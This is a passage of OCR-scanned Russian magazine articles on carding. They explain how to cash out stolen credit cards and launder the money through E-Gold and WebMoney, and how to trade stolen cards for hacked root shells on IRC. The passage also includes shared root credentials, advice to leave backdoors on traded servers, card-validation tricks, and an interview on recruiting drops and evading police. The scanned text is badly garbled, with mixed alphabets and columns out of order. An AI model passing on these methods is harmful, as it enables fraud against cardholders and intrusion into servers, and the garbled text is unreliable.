карты и документа, удостоверяю- 
щего личность. В этом случае, ес- 


ли ты не Kapgxongep, деньги полу- 
чить очень непросто. 


Происходит все так. Ты ищешь на вы- 
шеуказанном сайте обменники, кото- 
рые принимают кредитные карточки. 
Вбиваешь креду, указывая, сколько 
денег тебе нужно перевести с твоей 
карты на аккаунт в системе E-Gold. 
Жадешь несколько часов или, иногда, 
дней. Затем, если все проходит успеш- 
но - открываешь свой е-до!-аккаунт и 
удивляешься лежащей там сумме :). 
Но не все так просто, как кажется. 
Kapgxongep (хозяин креды) обяза- 
тельно сделает чардж-реверс (возв- 


Потенциальная валидная 
(т.е. с лежащей на ней энной суммой 
денег) креда стоит в среднем 52-3. 
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рат денег), когда увидит, что прокля- 
тый кардер нагло спер его честно за- 
работанные деньги. Ребята из обмен- 
ника отпишут в E-Gold - "помогите, нас 
ограбили". И твой E-Gold-akkayHT зак- 
роют вместе с деньгами. Так что 
очень важно успеть еще эти деньги 
отмыть. Есть люди, которые этим за- 
нимаются - ты шлешь им нелегальные 
деньги со своего аккаунта, а они отп- 
равляют тебе легальные WebMoney. 
Ты можешь возразить: мол, можно 
найти обменник E-GOLD > WM и быст- 
ренько самому обменять, чтобы не 
платить процент (и немалый) от воро- 
ванных денег нальщику (так зовут 
этого самого посредника). Но имей в 
виду, что вскоре этот обменник - пос- 
ле того, как E-Gold заберет у него 
деньги - свяжется еще и со службой 
поддержки WebMoney и потребует 
вернуть деньги. WM с удовольствием 
это сделает, плюс обязательно забло- 


кирует твой WM ID. То есть весь 
Keeper. В общем, девиз любого карде- 
ра - "Хочешь жить, умей вертеться". 


СПОСОБ ‘i: 2 
= ОТМЫВ ЧЕРЕЗ АУКЦИОН 

м Идем на интернет-аукцион 
www.molotok.ru и выкладываем там 
лот: "Домен + хостинг за ХХ $ в год! 
Оплата no WM". Потом, когда появят- 
ся покупатели, начинаем покупать по 
чужим кредам домены и хостинг на 
www.webhosting.com и продавать за 
ХХ $ покупателям с аукциона. 


Казалось бы, все просто. Но через не- 
которое время после продажи домены 
и хостинги... накроются. Почему? Да 
все потому же - Kapgxongep потребует 
вернуть украденные деньги, банк за- 
берет деньги у ВорлаХостинга, KOTO- 


чек, а при обнале - попросить пере- 
вести Ha WM. Таким образом, за вир- 
туальное общение с самим собой 
вполне реально заработать go 500 
долларов в месяц. 


СПОСОБ \\:5 - ПОТОРГУЙСЯ 
САМ С СОБОЙ 

m Что нам мешает покупать домены 
на CC и продавать их уже за WM? Су- 
ществует много сайтов, где продают 
готовые проекты или солидные 
эксклюзивные шаблоны для сайтов. 
Их тоже можно покупать на сс и про- 
давать через выгодную тебе платеж- 
ную систему. 
Торговать с самим собой можно и 
другим способом. К примеру, сделать 
РЕАЛЬНЫЙ сайт по продаже какого- 
нибудь сервиса или cogpTa. Сайт gon- 
жен быть именно реальный, чтобы 


У этого способа есть неоспоримый 
плюс - не надо ничего делать. Ни тебе 
сайтов, ни подключения к биллингам 


рый, в свою очередь, прикроет доме- 
ны. Получается, что твои покупатели 
выбросили деньги на ветер, а ты стал 
кидалой. Не здорово, правда? 


СПОСОБ \\:5 = ПАРТНЕРСКИЕ 
ПРОГРАММЫ 

m Для того чтобы осуществить этот 
способ, нам придется найти партнерс- 
кие программы, которые платят за 
клики или показы баннеров. Делаем 
сайт, где выкладываем эти самые бан- 
неры и скрипты спонсоров, покупаем 
много-много трабрика Ha сс. И - ждем 
свои WM. 
Тут, думаю, все шоколадно. Но кон- 
тент твоего сайта должен быть солид- 
ным, чтобы не привлекать внимание 
службы поддержки партнерских прог- 
рамм. Ведь они собираются тебе пла- 
тить, и если твой сайт будет представ- 
лять собой кашу из невразумительно- 
го текста и подозрительного дизайна, 
а счетчики будут показывать тысячи 
посетителей ежедневно, то это вызо- 
вет справедливые подозрения. Что 
может привести к закрытию твоего ак- 
ка. Этому способу посвящена целая 
статья этого номера, поэтому я не бу- 
gy останавливаться на нем подробно. 


СПОСОБ 1:4 - ЗАДАЙ СЕБЕ 
ВОПРОС ЗА ДЕНЬГИ 

m Наш путь лежит на SWapsmarts.com, 
в раздел "эксперт". Для реализации 
этого способа надо взять кучу карт 
без кода, создать аккаунты на этом 
сайте и задавать себе (как эксперту) 
вопросы из разных категорий. Каж- 
дый вопрос стоит определенную сум- 
му (ее ты требуешь сам ;)). За 2-3 воп- 
роса в день вполне может набежать 
10-20 долларов, и так - постоянно. При 
выводе придется попросить выслать 


мерчант мог это проверить и ничего 
не заподозрить. Затем - регистрируем 
аккаунт у мерчанта, ставим невысо- 
кую цену, устанавливаем все у себя 
на сайте. Осталось только раскрутить 
сайт, купить трасфик за СС, и, когда у 
тебя наберется достаточно посеще- 
ний, можно начинать покупать у само- 
го себя, только в разумных пределах 
и анонимно, опять же - мерчант не 
должен ничего заподозрить. Таким 
образом можно сделать пару сайтов и 
потихоньку работать. Главное - не пе- 
реборшить и знать меру. Потом, есте- 
ственно, получить сокровенные WM, 
если мерчант позволяет такую услугу, 
или, получив чек, перевести его во 
все те же WM. 


СПОСОБ 1-6 - РЕКЛАМИРУЙ 
СВОИ УСЛУГИ 

и Достаточно простой, на мой 
взгляд, способ. Для его осуществле- 
ния тебе нужно каким-то образом раз- 
рекламировать услугу: "Делаю хос- 
тинг с доменным именем для сайтов 
for life за п webmoney". А потом, пос- 
ле каждого заказа, заполнять ма- 
ленькую форму Ha ммм. по$топсе.сот 
и вписывать туда свои креды. На „1 
hostonce практически не прове- за 
ряют сс, и сайт никогда не 
закроют. А на следующий 
день тебе останется полу- 
чить свои "честно" зара- 
ботанные webmoney. Ра- / 
зумеется, за отлично / 
исполненный заказ. 


СПОСОБ 1157 = 

ЗАДОРНО, 

НО НЕ ПОРНО? 
и Главное здесь - найти че- 

рез какой-нибудь поисковик (нап- 


ример, google.com) Adult-cnoHcopos, 
которые предоставляют уже готовый 
магазин (к примеру, 
www.sextoyfun.com/). 

Эти спонсоры дают тебе процент 
с продаж с твоего (точнее, пре- 
доставленного тебе) сайта и 
платят за привлечение pecpepa- 
лов. Остается только прики- 
нуться порноманьяком - вбить 
карты на своем шопе. Потом, 
уже в роли порнопродавца, 
заказать чек через Western 
Express на WebMoney (если 
спонсор не работает сразу 
через WM). 

У этого способа есть неос- 
поримый плюс - не надо ни- 
чего делать. Ни тебе сай- 
тов, ни подключения к 
биллингам. Но есть и ми- 
нус - обычно дают не 
больше 25% с продажи. 


ЗАКЛЮЧЕНИЕ 
и Я описал далеко не 
все способы обналички 
денег с кредиток. А вот 
заниматься кардингом 
или HeT - это дело лич- 
но каждого. Могу лишь 
посоветовать не быть 
назойливым, иметь 
терпение, читать ум- 
ные книжки и, разуме- 
ется, наши статьи :). 
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ОСОБЕННОСТИ НАЦИО- 
НАЛЬНОГО ТРЕЙДИНГА 


КАК, НА ЧТО И ЗАЧЕМ МЕНЯЮТ КРЕДЫ В IRC 
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ь. 


многих начинающих кардеров возникает вопрос - где кардеры-профессионалы берут кредитные карты. 

Существует несколько способов: наломать самому, купить, и... обменять что-либо на заветную кредитную 
карту. Например, хакер может обменять пароль рута с взломанной тачки на несколько кред, аналогично можно 
поступить и с шеллом, эксплоитами, паролями на порнуху, спам-листом, проксями, соксами, баунсерами, и прочими 
полезными вещами. Где он найдет партнера? Конечно, в любимом IRC. 


связи с трагическими 


событиями, а именно с 


закрытием на буржуйс- 


ком ДалНете супер-пу- 


пер трейдерских кана- 
лов, таких, Kak #cc, #ccs, #carding, 
#carders, #trade, #trading, #ccstrade, 
#visa, #mastercard и многих-многих 
других, мы пойдем Ha EFNet. Ha ЭФ- 
Нете возникли кое-какие проблемы с 
заходом на каналы #сс$, #сс и #сага- 
ing, так как вход на них был только по 
инвайту (#carding can't join channel 
(invite only)). A gna Bxoga Ha KaHan 
Hcarders потребовался ключ. Пример- 
но через полчаса я выпросил инвайт 
на канал #carding. Каналы произвели 
на меня исключительно ОТРИЦА- 
ТЕЛЬНОЕ впечатление. Практически 
нулевая активность угнетала. 

Раз в пару минут высовывался какой- 
то товарищ с просьбой купить у него 
реальные пластиковые карты без 
пин-кода. Я любезно отказался. Лю- 
дей из России практически не было, 
но я все-таки нашел одного человека 
с ником "уШЛепок". Его ник говорил о 
чисто русском происхождении. Но он 
молчал. В это время я продолжал уси- 
ленно предлагать рут-шеллы на высо- 
коскоростных тачках, для чего ис- 
пользовал такую фразу: "| have fast 
root-shells in austria and UK, | need ccs 
with full info. /msg me for trade. | verify 
first. Rippers dont msg те". Буквально 
это переводится так: "У меня есть вы- 
сокоскоростной рут-шелл, мне нужны 
кредитные карты с полной информа- 
цией. Для обмена сообщи мне в при- 
ват. Я проверяю первый. Рипперам 
просьба не беспокоить". Для тех, кто 
не в курсе, кто такие рипперы, я нем- 
ного о них расскажу, и даже приведу 
пример диалога с риппером. Сначала 
определение. Рипперы - это такие то- 
варищи, которые обманывают честно 
обменивающихся людей, доверяю- 
щих им (рипперам) свои кредитки или 
прочий стаф для проверки, а они, за- 
юзав этот стаф, либо выходят из IRC, 
либо просто посылают реальных 
трейдеров куда подальше. Стоит за- 
метить, что таких людей банят, а 
встретив в реале, бьют морду. Меня, 
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впрочем, как и многих других трейде- 
ров, обманывали самым наглым обра- 
зом не один раз. Вот и сейчас ко мне в 
приват постучался, как оказалось, 
риппер. Вот наш диалог: 


<Splr1T> Hi bro! | see that you are trad- 
ing fast roots to full info ccs. (Привет, 
брат, я вижу, ты меняешь быстрые py- 
ты на кредитки с полной информаци- 
ей.) 

<Hi-Tech> yes. wanna trade? (Да, хо- 
чешь меняться?) 

<Splr1T> Yep. | can give you 4 ccs for 
one UK root. But I verify first! (la, 4 Mo- 
Гу дать тебе 4 кредитки за одного py- 
та в Великобритании. Но я проверяю 
первым!) 

<Hi-Tech> hmm...so many ccs for one 
root. it is strange. (XMM. Так много кре- 
дитных карт за одного рута. Это стран- 
но.) 


<Spir1T> | have а lot of ccs and | very 
need UK root now. (У меня есть много 


кредитных карт, и мне очень нужен 
рутв ИК.) 

<Hi-Tech> ok, i trust you. (Хорошо, я ве- 
рю тебе.) 

<Hi-Tech> here is ту root. (Вот мой рут.) 
<Hi-Tech> host: ds/34.super-root.co.uk. 
login: root. password: hi-tech. Port: SSH 
23. 

<Hi-Tech> test it. (Проверь ero.) 
<Splr1T> Ok, let те 5 mins to test. (OK, 
дай мне пять минут Ha проверку.) 
<Hi-Tech> пр (без проблем.) 

.. 5 minutes passed (прошло пять ми- 
HyT) 

<Hi-Tech> where are you, ppl? (Где ты, 
пипл?) 

Splr1T no such nick/channel (Spir1T нет 
такого ника/канала) 

Вот меня и обманули. Хорошо, что я 
оставил бэкдор на этой тачке =). 


Ha будущее мой тебе совет. Если ты 
трейдишь рутами, то ВСЕГДА остав- 
nan бэкдор. И обращай внимание на 
предложения об обмене других трей- 
деров. Если предложение кажется те- 
бе нереальным, то остерегайся. При- 
веду несколько примеров подозри- 
тельных сообщений. 


©. | am trading 2 ccs with cvv2 to 3 
ccs without cvv2. 

@. | am trading root to root. (Hy 3a- 
чем человеку менять рута Ha рута? 
Значит, либо его рут фигня, либо у не- 
го его вообще нет.) 

@. | have root, i need shell. (Ну зачем, 
зачем менять РУТА, где можно наст- 
ряпать до фига шеллов, на OGUH- 
единственный шелл?) 

@. | need root. | can get 10 ccs with 
cvv2 for it. 

Вот некоторые "расценки": 

За одного рута могут дать 2-3 кредит- 
ки с cvv2. Если челу понравился твой 
рут, то он может добавить еще. 

За одну Kpegy с CVV2 можно вытрей- 
дить Lenn, bnc user, реже bnc-admin. 
Возможно за одну такую Kpegy полу- 
чить 5-6 простых без с\\2. Правда, 
они никому не нужны. 


Мерчанты можно купить только за ре- 
альные деньги, т.к. достаются они с 
трудом (конкретно о мерчантах мы по- 
говорим чуть позже). 

Вот тебе еще несколько советов: 

©. Старайся иметь дело с трейдера- 
ми, у которых зарегистрированный 
ник (это не касается сетей, где нет 
сервисов). 

@. Опасайся ников, вроде 
SuperHacker31337. Настоящий хакер 
или кардер никогда не возьмет себе 
такой ник. 

®. Ники, типа Vasya4516, тоже 
должны вызывать опасение. 

@. Доверяй опам и войсам Ha круп- 
ных каналах. Что же касается малень- 
ких каналов, то они могут быть созда- 
ны рипперами и для рипперов, чтобы 
заманивать туда нормальных трейде- 
ров и обманывать их. 

Если чел говорит, что он в любой мо- 
мент может получить войса или опа, 
ни в коем случае не доверяй ему. Вот 
пусть сначала получит, а потом выка- 
зывает свои права. 

@. Советую не нарываться на ИР- 
КОпов. 

@. Не проверяй креды на канале, 
ибо это все - чистой воды обман. И 
еще, на канале есть такая функция, 
как !cvv. Это тоже слив, но она полез- 
на для проверки подлинности Cvv2 на 
карте. Допустим, ты вытрейдил креду 
C CvV2 и сомневаешься в том, что она 
валидная, или в том, что Cvv2 код пра- 
вильный. Для определения Cvv2 на 
каналах требуется только номер кре- 
ды, реже номер и дата завершения 
срока действия. Допустим, ты выме- 
нял что-то на креду с номером 
4234567890123456 и cvv2 552. Пи- 


шешь на канале: !cvv2 
4234567890123456. Если бот выдаст 
ответ 552 (такой же, как на KPege, ко- 
торую ты выменял), то этот с\\2 в де- 
вяносто девяти случаях из ста непра- 
вильный. И чел, который дал тебе эту 
креду - чистой воды обманщик. Раз 
CVV2, данный ботом, совпадает с Cvv2, 
данным тебе трейдером-обманщиком, 
значит, этот злодей использовал бота 
для генерирования с\\2, а бот, в свою 
очередь ВСЕГДА генерирует непра- 
вильный с\\2 код (это тебе пример 
доказательства от противного, пом- 
нишь геометрию за 9 класс?). Так что 
будь внимателен. 


Теперь поговорим о проверке полу- 
ченного товара. И о том, как, 
собственно, надо трейдиться. 


МЕНЯЮ СЛОНА НА КРЕДИТКУ 

и Сначала мы рассмотрим случай, 
когда ты меняешь что-то на кредит- 
ную карту. Тебе надо, естественно, 
проверить ее на вшивость. Во-пер- 
вых, проверь, не сгенерил ли чел с\\2 
с помощью бота. Как это делается, я 
описал выше. 
Во-вторых, для проверки нужен ре- 
альный мерчант, достать который 
очень трудно. Мерчант можно купить 
у других кардеров, но за приличные 
деньги. Что касается легального мер- 
чанта, то, если ты не гражданин Сое- 
диненных Штатов Америки или Кана- 
ды, добыть его просто нереально. Ес- 
ли он у тебя все-таки есть, проверяй с 
его помощью, если нет... попробуй ку- 
пить что-нибудь незначительное. 
Например, аккаунт на порносайте или 
хостинг. Желательно, чтобы при по- 
купке использовалась система ВИ 
или ей подобная, так как надо, чтобы 
деньги с кредитной карты прошли че- 
рез мерчант и попали продавцу сразу, 
а не отписывались куда-то в лог и 
только потом снимались. Кстати, срок 
жизни уже заюзанной нелегально 
креды - 2-3 GHA. Это в том случае, если 
до этого никакой кардер не трогал ее 
своими грязными лапами. Порносай- 
ты, я думаю, ты найдешь сам (раз уж 
использовать деньги с креды, то хотя 
бы с пользой). А вообще - отучайся от 
этих вещей, в этом тебе поможет 
www.shitcity.com. На нем тоже можно 
проверять креды, если, конечно, у те- 
бя крепкий желудок :). 
Если креда все-таки прошла, можешь 
спокойно откинуться на спинку крес- 
ла и почувствовать гордость за свою 
интуицию, которая тебя не подвела 
при трейдинге. 


МЕНЯЮ КРЕДИТКУ НА СЛОНА 

m Но не всегда же менять что-то на 
креды. Можно менять и креды на что- 
то. Например, на руты или шеллы. 
Если речь идет о шеллах, то они, в 
свою очередь, должны быть обяза- 
тельно leight. Т.е. самостоятельные, 
купленные трейдером на специаль- 
ном шелл-хостинге. Если же он соз- 


дал шелл на своей домашней, dedicat- 
ed или, тем более, взломанной тачке, 
то нет никакой гарантии, что, получив 
свое, он не прикроет твой аккаунт. По- 
этому старайся брать только leight 
шеллы. Узнать, leight он или нет, тебе 
поможет whois, но не чела, а его IP. 
Если ты увидишь, что машина, на ко- 
торой стоит шелл, окажется чем-то, 
типа clientOO7.dsl.superprovider.net, то 
это <censored>, а не Wenn, и лучше 
послать этого чела подальше. Если 
шелл принадлежит какому-либо 
шелл-хостингу, то трейдиться стоит. 
Если же шелл на диалапе, то это во- 
обще ужас. 


Сразу же спрашивай у трейдера хост 
рута или шелла. Если он собирается 
сказать его только после того, как ты 
дашь ему свои креды или еще что-то, 
то он риппер. А вот если ты вымени- 
ваешь у него рута, то проси тестовый 
шелл. Пусть он тебе его сделает. 
Предложи ему такую сделку: он дает 
тебе шелл, ты его тестишь, если тебе 
нравится скорость и прочие парамет- 
ры машины, к примеру, наличие на ней 
компилятора (на некоторых его нет, и 
приходится тратить кучу времени, что- 
бы залить все необходимое оля его 
установки), то ты даешь ему первую 
половину кред, в ответ он дает тебе 
рута, и ты, в свою очередь, отдаешь 
ему вторую половину крес. Этот вари- 
ант, на мой взгляд, оптимальный. 


Нет никакой гарантии на ВМС, потому 
что их создают на своих или взломан- 
ных шеллах. В таком случае трейдер, 
имея шелл, может спокойно удалить 
твой бпс, и тогда плакали твои креды. 
Никогда не верь в то, что трейдер выш- 
лет тебе креды или какие-либо пароли 
по мылу через час или завтра. В 99% 
случаев этого не произойдет. Если ты 
вымениваешь у трейдера рута, то об- 
рати внимание Ha то, VPS OH или нет. Ес- 
ли vps - зайди на хостинг, где он куп- » 
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лен, и посмотри, есть ли там панель уп- 
равления аккаунтом. Если есть, требуй 
на нее (на панель управления) пароль. 
Поскольку, зная пароль к панели уп- 
равления виртуальным сервером, мож- 
но сменить пароль рута, да и вообще 
сделать все что угодно. Еще бывает та- 
кая фишка, как тестовый аккаунт. Зай- 
ди, например, на Www.rusOnyx.ru, там 
ты сможешь получить рута на 2 часа. 
Это делается для того, чтобы ты хотя 
бы примерно оценил возможности их 
vps хостинга. После двух часов Vps 
(Virtual Private Server) будет останов- 
лен. Есть хостинги, которые дают тесто- 
вые серваки не на 2 часа, а порой на 2 
недели (был один такой... закрыли его 
за то, что почти все покупки на нем бы- 
ли нелегальными). 

Я сам часто использовал такой ме- 
TOG, даже скрипт написал, регистри- 
рующий эти урз'ки. А еще вполне 
можно за одну креду купить 5-6 
урз'ок, каждая из которых продер- 
жится целый год. И это не будет счи- 
таться обманом. Проверено, поэтому 
советую! Также советую тебе поку- 
пать шеллы Ha ispserver.com. Но тут 
возникает маленькая проблема - по- 
купать надо через PayPal. Креды в 
60 процентах случаев проходят, но 
ответ о завершении регистрации 
(создания) сервера так и не поступа- 
ет на e-mail, соответственно, и не 
создается. После одного такого ис- 
пользования креды Ha ispserver.com, 


она обычно попадает в black list. И 
везде перестает проходить. По инету 
ходят непроверенные слухи, что 
15рзегуег.сот просто кидают пользо- 
вателей. Если ты им не позвонишь, 
сервак не создадут. А снимают они с 
каждой креды около 100 баксов. 
Причем даже в том случае, если в 
дальнейшем они не создадут тебе 
сервер. В то время как через РауРа! 
все прокатывает отлично (сам пробо- 
вал). Мне, правда, все-таки хлопнули 
аккаунт, так как я вбухал на счет сра- 
зу около $5000 =). Им это показа- 
лось подозрительным. В итоге, они 
временно постопили мой vps и напи- 
сали на е-тай, чтобы я с ними кон- 
тактировал. В каком смысле они 
употребили слово "контактировал", 
для меня осталось загадкой. 


Пока я рассуждал, на связь со мной 
вышел русский трейдер (обрати вни- 
мание, не какой-нибудь там Джо или 
Майкл, а ylllJlenoK, наш, советский 
трейдер, можно сказать трейдер новой 
формации ;)). Вот наш с ним диалог: 


<ylllJlenoK> хай мэн! Рад видеть рус- 
ского трейдера на этом канале, нынче 
они как вымерли. 

<Hi-Tech> угу, есть такое, тоже рад :). 
Что хочешь и что есть? 

<ylllJlenoK> есть креды свежак, только 
что с интернет-магазина снял. Полная 
инфра, Cvv2, mmn, dob, e-mai, tel (home 
+ work), bank, bank phone, и естествен- 
но все остальное, кроме пин-кода, его, 
я ксожалению надыбать не смог, уж 
прости, брат. Зато к некоторым мылам 
с кред есть пароль и секурити квесчн 
с ответом. Могу сделать выборку по 
бинам или штату. 

<Hi-Tech> у, если это на самом деле 
так, то я у тебя эти креды могу за WM 
купить. И еще пару-тройку рутов от- 
дам с Cpanel на хостинге. 

<Hi-Tech> раз ты так богат кредами, 
дай одну потестить. Я не риппер, к то- 
му же у меня тут войс. 

<ylllJlenoK> предложи другие вариан- 
ты, чтобы я не боялся, что ты меня об- 
манешь, и чтобы ты тоже не считал 
меня риппером. Окей? 

<Hi-Tech> окей, сейчас придумаю. 
(Здесь мне пригодился тот вариант, 
которым я поделился с тобой выше, 
только немного измененный.) 
<Hi-Tech> давай сначала я обменяю 
тебе рутов на креды. Делать это бу- 
дем так: я тебе даю рута, но не даю 
пасс к Cpanel. ты мне даешь Kpegy с 
cvv2, но без прочей инеры. я ее про- 
веряю. Если она пашет, я отдаю тебе 
пасс Ha cpanel. ты его меняешь, тес- 
тишь. Если все ништяк, отдаешь мне 
прочую инфу о Kpege, ну которая ти- 
па бонусная :). Потом я отдам тебе 
еще 3 рута без cpanel. Ты мне отдашь 
креды, опять-таки без бонусной ин- 
фы. я тебе отдам пассы OT их Cpanel. 
Потом ты мне отдашь бонусную инфу 
о каждой из данных мне тобой кред. 
Я их проверю, если они пашут, то я 


тебе пошлю \/ты и куплю у тебя кре- 
ды за реальные лавэ. За 10 вмов 
сколько кред сможешь дать? 
<ylllJlenoK> прекрасный вариант, хоро- 
шо придумал. я смогу тебе дать 4 кре- 
ды 3a 1ОВмов. А если мне понравятся 
твои руты, то за каждого из них полу- 
чишь не по одной Kpege, а по две. Уст- 
раивает? 

<Hi-Tech> еще бы! 

<Hi-Tech> вот держи: 

host: deo kk 

login: root 

passwd: H1-TecH-traDe; port: SSH 
<Hi-Tech> проверяй. 

<ylllJlenoK> погоди сек... 

<Hi-Tech> оке 

<ylllJlenoK> работает, давай мыло или 
асю. 

<Hi-Tech> асю на. Номер ***** 
<ylllJlenoK> получил? 

<Hi-tech> да, получил, и проверил уже, 
работает нормально. Классные креды. 
<ylllJlenoK> ну, убедился, что я не рип- 
пер? Я убедился, что ты реально трей- 
дишься. 

<Hi-Tech> ga убедился;). Давай, чтобы 
все не затягивать, я тебе сразу все 
пассы на рутов и Cpanel отдаю, а ты 
мне креды в асю кидай. Пойдет? 
<ylllJlenoK> вполне. 

<Hi-Tech> пассы на рутов и срапе! у те- 
бя в асе. Проверяй. Меняй там мыло и 
пароль на свои. 

<ylllJlenoK> уже сменил. Все работает, 
руты реально скоростные! Держи бо- 
нусные креды в асю. И бонусную ин- 
фу:) 

<Hi-Tech> 10x, неплохо потрейдились 
<ylllJlenoK> aga 

<ylllJlenoK> teper' davay pokupay kredi 
esli hochesh. Moy WM ID: *******, Я те- 
бе за 1Овмов не четыре, а шесть кред 
дам, ты мне понравился :). 

<Hi-Tech> усе, бабло у тебя в кошель- 
ке. 

<ylllJlenoK> а креды у тебя в асе. Про- 
верь их. 

<Hi-Tech> думаю, не стоит проверять, я 
уверен, что они валидные. Если тебе 
понадобятся еще руты или шеллы, 
стучи в асю, теперь ты знаешь мой 
номер. 

<ylllJlenoK> хорошо. Так и сделаю. 
Удачи тебе. Было приятно познако- 
МИТЬСЯ. 

<Hi-Tech> 66, мне тоже. 

<ylllUlenokK> бывай! 
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Хорошим вопросам требуются хорошие ответы. 
Каждый день мы даем семь миллионов ответов миллиону любопытных граждан. 
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любом бизнесе много сложностей и нюансов. Кардерский He исключе- 
В ние. Одной твоей целеустремленности мало для реализации столь при- 
быльного дела, как вещевой кардинг. Как показывает практика, для того 
чтобы выйти сухим из воды, сперва надо набраться опыта и лишь потом 
претворять свои планы в жизнь. 


решил 
взять ин- 
тервью у 
известного 


в узких 


кругах JensMiller’a. Этот 


человек реально знает, 
как построить свое де- 

ло и что для этого тре- 

буется. 


© JensMiller, традици- 
онный первый воп- 
рос: в чем суть вещево- 
го кардинга, и почему 
он приобрел такую по- 
пулярность? 


Дело в том, что ве- 
щевой кардинг - од- 
но из самых инте- 
ресных, и в то же 
время доступных те- 
чений. Если человек 
знает, что делает, и 
имеет в подчинении 
хороших работни- 
ков, его бизнес пой- 
дет как по маслу. 
Главное найти nog- 
ходящую жертву и 
следить за безопас- 
HOCTbIO. 


© Это в теории. А как 
добиться этого на 
практике? Что за работни- 
ки будут принимать учас- 
тие в бизнесе кардера? 


Вообще, для того 
чтобы более-менее 
централизировать 
свое дело, кардеру 
необходимо найти 
опытных дропов, 
вбивальщиков и ка- 
чественный картон. 
И только после это- 
го можно выполнять 
какие-либо кардерс- 
кие действия. 


© Дропы? Что-то я 
даже не слышал о 
такой профессии ;). Что 
это за люди, и где их 
следует искать? 


Дропы - это попрос- 
ту те, кто подстав- 
ляет свою задницу 
и обналичивает че- 
ки. Кроме того, дроп 
занимается приня- 
тием и сбытом това- 
ра. В идеале, такой 
человек должен 
приносить кардеру 
реальные бабки, ну 
и, соответственно, 
получать некоторый 
процент от них. Что 
касается поиска, 
этот народ ищется в 
основном на фору- 
мах по работе либо 
рекомендуются зна- 
комыми кардерами. 


© Если доказывают - 
судят? 


Да, но, как я уже 
сказал, кардинг - 
всего лишь мошен- 
ничество. За это да- 
ют условный срок с 
конфискацией ком- 
па. За подробностя- 
ми можешь загля- 


нуть в уголовный ко- 


декс - найдешь там 
много интересного ;). 
Кстати, судимостей 
за вещевой кардинг 
не так уж и много. В 
основном ловят за 
реал кардинг (nog- 
делка пластиковых 
карт). Здесь все go- 
вольно серьезно, 
вот, недавно взяли 
парней с поличным... 


Чем занимаются 
вбивальщики? 


Вбивальщики зани- 
маются только вби- 
вом информации о 
карте в интернет- 
магазинах либо 
аукционах. Они иг- 
рают огромную 
роль в жизни кар- 
дера, особенно ког- 
да ему лень вби- 
вать данные само- 
му. Это, как прави- 
ло, начинающие 
кардеры, которые 
получают за свою 
работу довольно 
неплохие деньги, а 
также набираются 
опыта. Опыт же в 
кардинге - вещь 
незаменимая. 


© Хотелось бы знать 
реальную зарпла- 
Ту таких подчиненных. 


Если вбивальщик 
получает некоторую 
сумму за каждый ус- 
пешный вбив (а он 
подразумевает ус- 
пешную сделку), ему 
выдается от 2 go 5$ 
(так плачу я). С дро- 
пом рассчитываются 
процентом от сделки. 
Когда это проверен- 
ный рекомендован- 
ный чел, ему отвали- 
вают 40-50%. Если 
же чувак был найден 
на форуме, то, пожа- 
луй, он сам не подоз- 
ревает, что является 
дропом. В этом слу- 
чае зарплата копе- 
ечная - 5-10% от 
сделки. Хотя это то- 
же зависит от прово- 
димой махинации. 


Да, конечно. И мето- 
дов довольно много. 
Начиная от баналь- 
ной проверки с по- 
мощью порносайтов 
(безбожно устарело) 
и заканчивая Х- 
login’amu. Это, поп- 
росту, аккаунт на 
сайте www.author- 
ize.net. Поиметь туда 
доступ непросто - 
обычно аккаунты 
продаются в различ- 
ных местах, либо под- 
бираются наудачу. 
Суть этого метода 
заключается в том, 
что сервер подает 
запрос банку, кото- 
рый отвечает, имеет- 
ся ли сумма на карте. 
Хотя я считаю, что 
после всяких вали- 
дейшенов картон 
уже не является 
девственным, потому 
как все чекалки бе- 
рут себе некоторый 
процент от запро- 
шенной суммы. За ус- 
луги ;). Поэтому если 
чел, который распро- 
страняет картон, хо- 
рошо зарекоменадо- 
вал себя - его товар 
не проверяется на 


валидность. 


Если соблюдал ано- 
нимность - не пойма- 
ют, но товар тебе не 
вышлют, это прове- 
ренный факт. Да и 
зачем ломать свои, 
когда существуют 
буржуйские ресур- 
сы. Иностранцы на- 
род наивный и охот- 
но расстаются с 
деньгами. 


Ш Автор выражает благодарность JensMiller (emailer@smtp.ru) за 


тервью. Этот человек познал непростые азы кардинга, а начинал 


большинство кардеров - с работы вбивальщиком. 


Лучше картон добы- 
вать самому. Искать 
людей, которые вы- 
носят его с хостин- 


гов и инет-магази- 
нов. Но это редко ко- 
му удается. В основ- 
ном, карты продают- 
ся на буржуйских се- 
TAX типа DalNet и 
Efnet (большинство 
крупных каналов, 
кстати, были недавно 
прикрыты). Их расп- 
ространяют прове- 
ренные люби, кото- 
рые за счет этого 
живут. Картон счита- 
ется качественным, 
если из 100 кредиток 
валидны не менее 
95. Когда это усло- 
вие нарушается, 
продавец обязан за- 


менить товар. 


Не могу. Это закры- 
тая информация и 
доступна она лишь 
проверенным лю- 
gam. Скажу лишь 
одно - не стоит кар- 
дить российские ма- 
газины, это бес- 
смысленно. 


Как повезет. Все за- 
висит от сделок, ко- 
торые были успешно 
реализованы за про- 
межуток времени. В 
основном соверша- 
ется от десятка go 
сотни прибыльных 
сделок. При этом, ес- 
ли говорить о cpeg- 
ней прибыли, кардер 
может получать от 
$1000 go $20000. 


Философский воп- 
рос ;). Причины мо- 
гут быть разными, 
но ловят в основ- 


ном на мелочах 
(например, из-за 
захода с реального 
ip-agpeca). Бывают 
и случаи, когда об- 
лажался дроп, тем 
самым подставив 
задницу кардера. 
Радует лишь то, 
что у нас в России 
кардинг приравни- 
вается к обычному 
мошенничеству. 
Порой наши добле- 
стные правоохра- 
нительные органы 
вообще с трудом 
представляют, как 
можно купить то- 
вар в интернете, да 
еще и расплатив- 
шись кредиткой. 
Но в любом случае, 
милиция пытается 
доказать, что кар- 
дер действительно 
осуществлял про- 
тивозаконные ма- 
хинации. 


Да, могу. Но следует 
оговориться, что бе- 
зопасность - это не 
проблема кардера, а 
задача вбивальщи- 
ка. Он пользуется 
стандартным набо- 
ром утилит, которые 
помогают ему в этом 
деле. Вот тебе завет- 
ный список ;) - среди 
программ есть и тул- 
зы, которые юзает 
сам кардер. 


SocksChain - создает 
цепочку прокси или 
Socks-cepBepos для 
анонимности (у а- 
soft.com/files/sockschain_setup. 
exe). 

A4proxy - незамени- 
мая прога при работе 
с НТТР-проксями. На- 
ходит валидные и 
анонимные из огром- 
ного списка 
(http://antichat.ru/soft/mwg- 
A4Proxy252.FullRetail zip). 
PGP - Софтина для 
шифрования данных 
на диске. Как альтер- 
нативу могу предло- 
жить BestCrypt 
(www,jetico.com/bcrypt6.exe). 


Покупают. Для этого 
существуют свои те- 
матические ресурсы. 
Например, 
www.proxyboss.net. 
Вообще достать no- 
добные вещи не 
